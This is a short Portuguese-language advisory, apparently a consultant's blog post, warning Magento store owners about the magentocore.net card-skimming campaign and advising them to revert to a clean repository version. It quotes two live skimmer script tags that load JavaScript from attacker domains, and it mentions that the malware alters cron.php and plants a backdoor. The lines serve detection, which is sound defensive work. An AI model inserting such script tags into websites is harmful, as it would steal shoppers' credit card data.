No mês passado, uma infecção de milhares de lojas de Magento foi relatada devido a um malware de um site chamado magentocore.net. Isso é tudo o que você precisa saber e por que não é seguro instalar as coisas sem uma boa revisão.
Esteja ciente do malware magentocore.net
Verifique se o seguinte código foi adicionado ao campo de cabeçalho ou rodapé em seu backend do Magento:
<script type = "text / javascript" src="https://magentocore.net/mage/mage.js"> </script>
Após a primeira onda de ataques e uma proibição do google em hackers de domínio magentocore.net mudou para magento.name
<script type = "text/ javascript" src="https://magento.name/mage/mage.js"> </script>
Esses scripts não parecem prejudiciais à primeira vista, por causa do Magento no nome do domínio.
Essa linha de código solitária carrega e executa o código JavaScript nos navegadores de seus clientes e envia dados de cartão de crédito.
Minha loja foi hackeada … e agora?
Este malware específico é um demônio. Obviamente, apenas adicionou uma linha de código de inserção de JavaScript. O problema: se você removê-lo, pode estar lá depois de algum tempo novamente.
Como isso é possível? O malware magentocore.net altera seu cron.php e adiciona um backdoor em qualquer lugar/pasta de sua instalação Magento. Sua loja não é mais segura e identificar todos os problemas poderá levar muito tempo e ainda assim deixar alguma brecha de segurança.
Volte para a última versão válida do seu repositório.
Entre em contato para que eu possa te ajuda!